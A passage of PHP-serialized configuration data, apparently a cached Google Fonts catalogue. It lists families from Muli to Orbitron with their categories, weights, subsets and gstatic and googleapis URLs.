PAw.ttf";s:6:"italic";s:61:"http://fonts.gstatic.com/s/muli/v9/Cg0K_IWANs9xkNoxV7H1_w.ttf";}s:4:"urls";a:4:{i:300;s:48:"https://fonts.googleapis.com/css?family=Muli:300";s:9:"300italic";s:54:"https://fonts.googleapis.com/css?family=Muli:300italic";s:7:"regular";s:52:"https://fonts.googleapis.com/css?family=Muli:regular";s:6:"italic";s:51:"https://fonts.googleapis.com/css?family=Muli:italic";}}s:13:"mystery_quest";a:7:{s:4:"name";s:13:"Mystery Quest";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:90:"http://fonts.gstatic.com/s/mysteryquest/v4/467jJvg0c7HgucvBB9PLDyeUSrabuTpOsMEiRLtKwk0.ttf";}s:4:"urls";a:1:{s:7:"regular";s:61:"https://fonts.googleapis.com/css?family=Mystery+Quest:regular";}}s:3:"ntr";a:7:{s:4:"name";s:3:"NTR";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:6:"telugu";}s:5:"files";a:1:{s:7:"regular";s:60:"http://fonts.gstatic.com/s/ntr/v4/e7H4ZLtGfVOYyOupo6T12g.ttf";}s:4:"urls";a:1:{s:7:"regular";s:51:"https://fonts.googleapis.com/css?family=NTR:regular";}}s:6:"neucha";a:7:{s:4:"name";s:6:"Neucha";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:8:"cyrillic";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/neucha/v8/bijdhB-TzQdtpl0ykhGh4Q.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Neucha:regular";}}s:6:"neuton";a:7:{s:4:"name";s:6:"Neuton";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:6:{i:0;s:3:"200";i:1;s:3:"300";i:2;s:7:"regular";i:3;s:6:"italic";i:4;s:3:"700";i:5;s:3:"800";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:6:{i:200;s:63:"http://fonts.gstatic.com/s/neuton/v8/DA3Mkew3XqSkPpi1f4tJow.ttf";i:300;s:63:"http://fonts.gstatic.com/s/neuton/v8/xrc_aZ2hx-gdeV0mlY8Vww.ttf";s:7:"regular";s:63:"http://fonts.gstatic.com/s/neuton/v8/9R-MGIOQUdjAVeB6nE6PcQ.ttf";s:6:"italic";s:63:"http://fonts.gstatic.com/s/neuton/v8/uVMT3JOB5BNFi3lgPp6kEg.ttf";i:700;s:63:"http://fonts.gstatic.com/s/neuton/v8/gnWpkWY7DirkKiovncYrfg.ttf";i:800;s:63:"http://fonts.gstatic.com/s/neuton/v8/XPzBQV4lY6enLxQG9cF1jw.ttf";}s:4:"urls";a:6:{i:200;s:50:"https://fonts.googleapis.com/css?family=Neuton:200";i:300;s:50:"https://fonts.googleapis.com/css?family=Neuton:300";s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Neuton:regular";s:6:"italic";s:53:"https://fonts.googleapis.com/css?family=Neuton:italic";i:700;s:50:"https://fonts.googleapis.com/css?family=Neuton:700";i:800;s:50:"https://fonts.googleapis.com/css?family=Neuton:800";}}s:10:"new_rocker";a:7:{s:4:"name";s:10:"New Rocker";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/newrocker/v5/EFUWzHJedEkpW399zYOHofesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=New+Rocker:regular";}}s:10:"news_cycle";a:7:{s:4:"name";s:10:"News Cycle";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:2:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/newscycle/v13/xyMAr8VfiUzIOvS1abHJO_esZW2xOQ-xsNqO47m55DA.ttf";i:700;s:88:"http://fonts.gstatic.com/s/newscycle/v13/G28Ny31cr5orMqEQy6ljtwJKKGfqHaYFsRG-T3ceEVo.ttf";}s:4:"urls";a:2:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=News+Cycle:regular";i:700;s:54:"https://fonts.googleapis.com/css?family=News+Cycle:700";}}s:7:"niconne";a:7:{s:4:"name";s:7:"Niconne";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/niconne/v6/ZA-mFw2QNXodx5y7kfELBg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Niconne:regular";}}s:9:"nixie_one";a:7:{s:4:"name";s:9:"Nixie One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/nixieone/v7/h6kQfmzm0Shdnp3eswRaqQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Nixie+One:regular";}}s:6:"nobile";a:7:{s:4:"name";s:6:"Nobile";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:4:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/nobile/v7/lC_lPi1ddtN38iXTCRh6ow.ttf";s:6:"italic";s:63:"http://fonts.gstatic.com/s/nobile/v7/vGmrpKzWQQSrb-PR6FWBIA.ttf";i:700;s:63:"http://fonts.gstatic.com/s/nobile/v7/9p6M-Yrg_r_QPmSD1skrOg.ttf";s:9:"700italic";s:84:"http://fonts.gstatic.com/s/nobile/v7/oQ1eYPaXV638N03KvsNvyKCWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:4:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Nobile:regular";s:6:"italic";s:53:"https://fonts.googleapis.com/css?family=Nobile:italic";i:700;s:50:"https://fonts.googleapis.com/css?family=Nobile:700";s:9:"700italic";s:56:"https://fonts.googleapis.com/css?family=Nobile:700italic";}}s:6:"nokora";a:7:{s:4:"name";s:6:"Nokora";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:1:{i:0;s:5:"khmer";}s:5:"files";a:2:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/nokora/v9/dRyz1JfnyKPNaRcBNX9F9A.ttf";i:700;s:63:"http://fonts.gstatic.com/s/nokora/v9/QMqqa4QEOhQpiig3cAPmbQ.ttf";}s:4:"urls";a:2:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Nokora:regular";i:700;s:50:"https://fonts.googleapis.com/css?family=Nokora:700";}}s:7:"norican";a:7:{s:4:"name";s:7:"Norican";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/norican/v4/SHnSqhYAWG5sZTWcPzEHig.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Norican:regular";}}s:7:"nosifer";a:7:{s:4:"name";s:7:"Nosifer";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/nosifer/v5/7eJGoIuHRrtcG00j6CptSA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Nosifer:regular";}}s:20:"nothing_you_could_do";a:7:{s:4:"name";s:20:"Nothing You Could Do";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:95:"http://fonts.gstatic.com/s/nothingyoucoulddo/v6/jpk1K3jbJoyoK0XKaSyQAf-TpkXjXYGWiJZAEtBRjPU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:68:"https://fonts.googleapis.com/css?family=Nothing+You+Could+Do:regular";}}s:12:"noticia_text";a:7:{s:4:"name";s:12:"Noticia Text";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:10:"vietnamese";i:2;s:9:"latin-ext";}s:5:"files";a:4:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/noticiatext/v6/wdyV6x3eKpdeUPQ7BJ5uUC3USBnSvpkopQaUR-2r7iU.ttf";s:6:"italic";s:89:"http://fonts.gstatic.com/s/noticiatext/v6/dAuxVpkYE_Q_IwIm6elsKPMZXuCXbOrAvx5R0IT5Oyo.ttf";i:700;s:89:"http://fonts.gstatic.com/s/noticiatext/v6/pEko-RqEtp45bE2P80AAKUD2ttfZwueP-QU272T9-k4.ttf";s:9:"700italic";s:89:"http://fonts.gstatic.com/s/noticiatext/v6/-rQ7V8ARjf28_b7kRa0JuvAs9-1nE9qOqhChW0m4nDE.ttf";}s:4:"urls";a:4:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Noticia+Text:regular";s:6:"italic";s:59:"https://fonts.googleapis.com/css?family=Noticia+Text:italic";i:700;s:56:"https://fonts.googleapis.com/css?family=Noticia+Text:700";s:9:"700italic";s:62:"https://fonts.googleapis.com/css?family=Noticia+Text:700italic";}}s:9:"noto_sans";a:7:{s:4:"name";s:9:"Noto Sans";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:8:{i:0;s:5:"latin";i:1;s:5:"greek";i:2;s:9:"greek-ext";i:3;s:10:"vietnamese";i:4;s:12:"cyrillic-ext";i:5;s:9:"latin-ext";i:6;s:8:"cyrillic";i:7;s:10:"devanagari";}s:5:"files";a:4:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/notosans/v6/0Ue9FiUJwVhi4NGfHJS5uA.ttf";s:6:"italic";s:86:"http://fonts.gstatic.com/s/notosans/v6/dLcNKMgJ1H5RVoZFraDz0qCWcynf_cDxXwCLxiixG1c.ttf";i:700;s:86:"http://fonts.gstatic.com/s/notosans/v6/PIbvSEyHEdL91QLOQRnZ1y3USBnSvpkopQaUR-2r7iU.ttf";s:9:"700italic";s:86:"http://fonts.gstatic.com/s/notosans/v6/9Z3uUWMRR7crzm1TjRicDne1Pd76Vl7zRpE7NLJQ7XU.ttf";}s:4:"urls";a:4:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Noto+Sans:regular";s:6:"italic";s:56:"https://fonts.googleapis.com/css?family=Noto+Sans:italic";i:700;s:53:"https://fonts.googleapis.com/css?family=Noto+Sans:700";s:9:"700italic";s:59:"https://fonts.googleapis.com/css?family=Noto+Sans:700italic";}}s:10:"noto_serif";a:7:{s:4:"name";s:10:"Noto Serif";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:7:{i:0;s:5:"latin";i:1;s:5:"greek";i:2;s:9:"greek-ext";i:3;s:10:"vietnamese";i:4;s:12:"cyrillic-ext";i:5;s:9:"latin-ext";i:6;s:8:"cyrillic";}s:5:"files";a:4:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/notoserif/v4/zW6mc7bC1CWw8dH0yxY8JfesZW2xOQ-xsNqO47m55DA.ttf";s:6:"italic";s:87:"http://fonts.gstatic.com/s/notoserif/v4/HQXBIwLHsOJCNEQeX9kNzy3USBnSvpkopQaUR-2r7iU.ttf";i:700;s:87:"http://fonts.gstatic.com/s/notoserif/v4/lJAvZoKA5NttpPc9yc6lPQJKKGfqHaYFsRG-T3ceEVo.ttf";s:9:"700italic";s:87:"http://fonts.gstatic.com/s/notoserif/v4/Wreg0Be4tcFGM2t6VWytvED2ttfZwueP-QU272T9-k4.ttf";}s:4:"urls";a:4:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Noto+Serif:regular";s:6:"italic";s:57:"https://fonts.googleapis.com/css?family=Noto+Serif:italic";i:700;s:54:"https://fonts.googleapis.com/css?family=Noto+Serif:700";s:9:"700italic";s:60:"https://fonts.googleapis.com/css?family=Noto+Serif:700italic";}}s:8:"nova_cut";a:7:{s:4:"name";s:8:"Nova Cut";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/novacut/v8/6q12jWcBvj0KO2cMRP97tA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Nova+Cut:regular";}}s:9:"nova_flat";a:7:{s:4:"name";s:9:"Nova Flat";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/novaflat/v8/pK7a0CoGzI684qe_XSHBqQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Nova+Flat:regular";}}s:9:"nova_mono";a:7:{s:4:"name";s:9:"Nova Mono";s:8:"category";s:9:"monospace";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:5:"greek";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/novamono/v7/6-SChr5ZIaaasJFBkgrLNw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Nova+Mono:regular";}}s:9:"nova_oval";a:7:{s:4:"name";s:9:"Nova Oval";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/novaoval/v8/VuukVpKP8BwUf8o9W5LYQQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Nova+Oval:regular";}}s:10:"nova_round";a:7:{s:4:"name";s:10:"Nova Round";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/novaround/v8/7-cK3Ari_8XYYFgVMxVhDvesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Nova+Round:regular";}}s:11:"nova_script";a:7:{s:4:"name";s:11:"Nova Script";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/novascript/v8/dEvxQDLgx1M1TKY-NmBWYaCWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:1:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Nova+Script:regular";}}s:9:"nova_slim";a:7:{s:4:"name";s:9:"Nova Slim";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/novaslim/v8/rPYXC81_VL2EW-4CzBX65g.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Nova+Slim:regular";}}s:11:"nova_square";a:7:{s:4:"name";s:11:"Nova Square";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/novasquare/v8/BcBzXoaDzYX78rquGXVuSqCWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:1:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Nova+Square:regular";}}s:6:"numans";a:7:{s:4:"name";s:6:"Numans";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/numans/v6/g5snI2p6OEjjTNmTHyBdiQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Numans:regular";}}s:6:"nunito";a:7:{s:4:"name";s:6:"Nunito";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:3:{i:0;s:3:"300";i:1;s:7:"regular";i:2;s:3:"700";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:3:{i:300;s:63:"http://fonts.gstatic.com/s/nunito/v7/zXQvrWBJqUooM7Xv98MrQw.ttf";s:7:"regular";s:63:"http://fonts.gstatic.com/s/nunito/v7/ySZTeT3IuzJj0GK6uGpbBg.ttf";i:700;s:63:"http://fonts.gstatic.com/s/nunito/v7/aEdlqgMuYbpe4U3TnqOQMA.ttf";}s:4:"urls";a:3:{i:300;s:50:"https://fonts.googleapis.com/css?family=Nunito:300";s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Nunito:regular";i:700;s:50:"https://fonts.googleapis.com/css?family=Nunito:700";}}s:14:"odor_mean_chey";a:7:{s:4:"name";s:14:"Odor Mean Chey";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"khmer";}s:5:"files";a:1:{s:7:"regular";s:90:"http://fonts.gstatic.com/s/odormeanchey/v8/GK3E7EjPoBkeZhYshGFo0eVKG8sq4NyGgdteJLvqLDs.ttf";}s:4:"urls";a:1:{s:7:"regular";s:62:"https://fonts.googleapis.com/css?family=Odor+Mean+Chey:regular";}}s:7:"offside";a:7:{s:4:"name";s:7:"Offside";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/offside/v4/v0C913SB8wqQUvcu1faUqw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Offside:regular";}}s:15:"old_standard_tt";a:7:{s:4:"name";s:15:"Old Standard TT";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:3:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:3:{s:7:"regular";s:91:"http://fonts.gstatic.com/s/oldstandardtt/v7/n6RTCDcIPWSE8UNBa4k-DLcB5jyhm1VsHs65c3QNDr0.ttf";s:6:"italic";s:91:"http://fonts.gstatic.com/s/oldstandardtt/v7/QQT_AUSp4AV4dpJfIN7U5PWrQzeMtsHf8QsWQ2cZg3c.ttf";i:700;s:91:"http://fonts.gstatic.com/s/oldstandardtt/v7/5Ywdce7XEbTSbxs__4X1_HJqbZqK7TdZ58X80Q_Lw8Y.ttf";}s:4:"urls";a:3:{s:7:"regular";s:63:"https://fonts.googleapis.com/css?family=Old+Standard+TT:regular";s:6:"italic";s:62:"https://fonts.googleapis.com/css?family=Old+Standard+TT:italic";i:700;s:59:"https://fonts.googleapis.com/css?family=Old+Standard+TT:700";}}s:9:"oldenburg";a:7:{s:4:"name";s:9:"Oldenburg";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:66:"http://fonts.gstatic.com/s/oldenburg/v4/dqA_M_uoCVXZbCO-oKBTnQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Oldenburg:regular";}}s:11:"oleo_script";a:7:{s:4:"name";s:11:"Oleo Script";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:2:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/oleoscript/v5/21stZcmPyzbQVXtmGegyqKCWcynf_cDxXwCLxiixG1c.ttf";i:700;s:88:"http://fonts.gstatic.com/s/oleoscript/v5/hudNQFKFl98JdNnlo363fne1Pd76Vl7zRpE7NLJQ7XU.ttf";}s:4:"urls";a:2:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Oleo+Script:regular";i:700;s:55:"https://fonts.googleapis.com/css?family=Oleo+Script:700";}}s:22:"oleo_script_swash_caps";a:7:{s:4:"name";s:22:"Oleo Script Swash Caps";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:2:{s:7:"regular";s:97:"http://fonts.gstatic.com/s/oleoscriptswashcaps/v4/vdWhGqsBUAP-FF3NOYTe4iMF4kXAPemmyaDpMXQ31P0.ttf";i:700;s:97:"http://fonts.gstatic.com/s/oleoscriptswashcaps/v4/HMO3ftxA9AU5floml9c755reFYaXZ4zuJXJ8fr8OO1g.ttf";}s:4:"urls";a:2:{s:7:"regular";s:70:"https://fonts.googleapis.com/css?family=Oleo+Script+Swash+Caps:regular";i:700;s:66:"https://fonts.googleapis.com/css?family=Oleo+Script+Swash+Caps:700";}}s:9:"open_sans";a:7:{s:4:"name";s:9:"Open Sans";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:10:{i:0;s:3:"300";i:1;s:9:"300italic";i:2;s:7:"regular";i:3;s:6:"italic";i:4;s:3:"600";i:5;s:9:"600italic";i:6;s:3:"700";i:7;s:9:"700italic";i:8;s:3:"800";i:9;s:9:"800italic";}s:7:"subsets";a:7:{i:0;s:5:"latin";i:1;s:5:"greek";i:2;s:9:"greek-ext";i:3;s:10:"vietnamese";i:4;s:12:"cyrillic-ext";i:5;s:9:"latin-ext";i:6;s:8:"cyrillic";}s:5:"files";a:10:{i:300;s:87:"http://fonts.gstatic.com/s/opensans/v13/DXI1ORHCpsQm3Vp6mXoaTS3USBnSvpkopQaUR-2r7iU.ttf";s:9:"300italic";s:87:"http://fonts.gstatic.com/s/opensans/v13/PRmiXeptR36kaC0GEAetxi9-WlPSxbfiI49GsXo3q0g.ttf";s:7:"regular";s:66:"http://fonts.gstatic.com/s/opensans/v13/IgZJs4-7SA1XX_edsoXWog.ttf";s:6:"italic";s:87:"http://fonts.gstatic.com/s/opensans/v13/O4NhV7_qs9r9seTo7fnsVKCWcynf_cDxXwCLxiixG1c.ttf";i:600;s:87:"http://fonts.gstatic.com/s/opensans/v13/MTP_ySUJH_bn48VBG8sNSi3USBnSvpkopQaUR-2r7iU.ttf";s:9:"600italic";s:87:"http://fonts.gstatic.com/s/opensans/v13/PRmiXeptR36kaC0GEAetxpZ7xm-Bj30Bj2KNdXDzSZg.ttf";i:700;s:87:"http://fonts.gstatic.com/s/opensans/v13/k3k702ZOKiLJc3WVjuplzC3USBnSvpkopQaUR-2r7iU.ttf";s:9:"700italic";s:87:"http://fonts.gstatic.com/s/opensans/v13/PRmiXeptR36kaC0GEAetxne1Pd76Vl7zRpE7NLJQ7XU.ttf";i:800;s:87:"http://fonts.gstatic.com/s/opensans/v13/EInbV5DfGHOiMmvb1Xr-hi3USBnSvpkopQaUR-2r7iU.ttf";s:9:"800italic";s:87:"http://fonts.gstatic.com/s/opensans/v13/PRmiXeptR36kaC0GEAetxg89PwPrYLaRFJ-HNCU9NbA.ttf";}s:4:"urls";a:10:{i:300;s:53:"https://fonts.googleapis.com/css?family=Open+Sans:300";s:9:"300italic";s:59:"https://fonts.googleapis.com/css?family=Open+Sans:300italic";s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Open+Sans:regular";s:6:"italic";s:56:"https://fonts.googleapis.com/css?family=Open+Sans:italic";i:600;s:53:"https://fonts.googleapis.com/css?family=Open+Sans:600";s:9:"600italic";s:59:"https://fonts.googleapis.com/css?family=Open+Sans:600italic";i:700;s:53:"https://fonts.googleapis.com/css?family=Open+Sans:700";s:9:"700italic";s:59:"https://fonts.googleapis.com/css?family=Open+Sans:700italic";i:800;s:53:"https://fonts.googleapis.com/css?family=Open+Sans:800";s:9:"800italic";s:59:"https://fonts.googleapis.com/css?family=Open+Sans:800italic";}}s:19:"open_sans_condensed";a:7:{s:4:"name";s:19:"Open Sans Condensed";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:3:{i:0;s:3:"300";i:1;s:9:"300italic";i:2;s:3:"700";}s:7:"subsets";a:7:{i:0;s:5:"latin";i:1;s:5:"greek";i:2;s:9:"greek-ext";i:3;s:10:"vietnamese";i:4;s:12:"cyrillic-ext";i:5;s:9:"latin-ext";i:6;s:8:"cyrillic";}s:5:"files";a:3:{i:300;s:96:"http://fonts.gstatic.com/s/opensanscondensed/v10/gk5FxslNkTTHtojXrkp-xEMwSSh38KQVJx4ABtsZTnA.ttf";s:9:"300italic";s:96:"http://fonts.gstatic.com/s/opensanscondensed/v10/jIXlqT1WKafUSwj6s9AzV4_LkTZ_uhAwfmGJ084hlvM.ttf";i:700;s:96:"http://fonts.gstatic.com/s/opensanscondensed/v10/gk5FxslNkTTHtojXrkp-xBEM87DM3yorPOrvA-vB930.ttf";}s:4:"urls";a:3:{i:300;s:63:"https://fonts.googleapis.com/css?family=Open+Sans+Condensed:300";s:9:"300italic";s:69:"https://fonts.googleapis.com/css?family=Open+Sans+Condensed:300italic";i:700;s:63:"https://fonts.googleapis.com/css?family=Open+Sans+Condensed:700";}}s:11:"oranienbaum";a:7:{s:4:"name";s:11:"Oranienbaum";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:4:{i:0;s:5:"latin";i:1;s:12:"cyrillic-ext";i:2;s:9:"latin-ext";i:3;s:8:"cyrillic";}s:5:"files";a:1:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/oranienbaum/v5/M98jYwCSn0PaFhXXgviCoaCWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:1:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Oranienbaum:regular";}}s:8:"orbitron";a:7:{s:4:"name";s:8:"Orbitron";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:3:"500";i:2;s:3:"700";i:3;s:3:"900";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:4:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/orbitron/v7/DY8swouAZjR3RaUPRf0HDQ.ttf";i:500;s:86:"http://fonts.gstatic.com/s/orbitron/v7/p-y_ffzMdo5JN_7ia0vYEqCWcynf_cDxXwCLxiixG1c.ttf";i:700;s:86:"http://fonts.gstatic.com/s/orbitron/v7/PS9_6SLkY1Y6OgPO3APr6qCWcynf_cDxXwCLxiixG1c.ttf";i:900;s:86:"http://fonts.gstatic.com/s/orbitron/v7/2I3-8i9hT294TE_pyjy9SaCWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:4:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Orbitron:regular";i:500;s:52:"https://fonts.googleapis.com/css?family=Orbitron:500";i:700;s:52:"https://fonts.go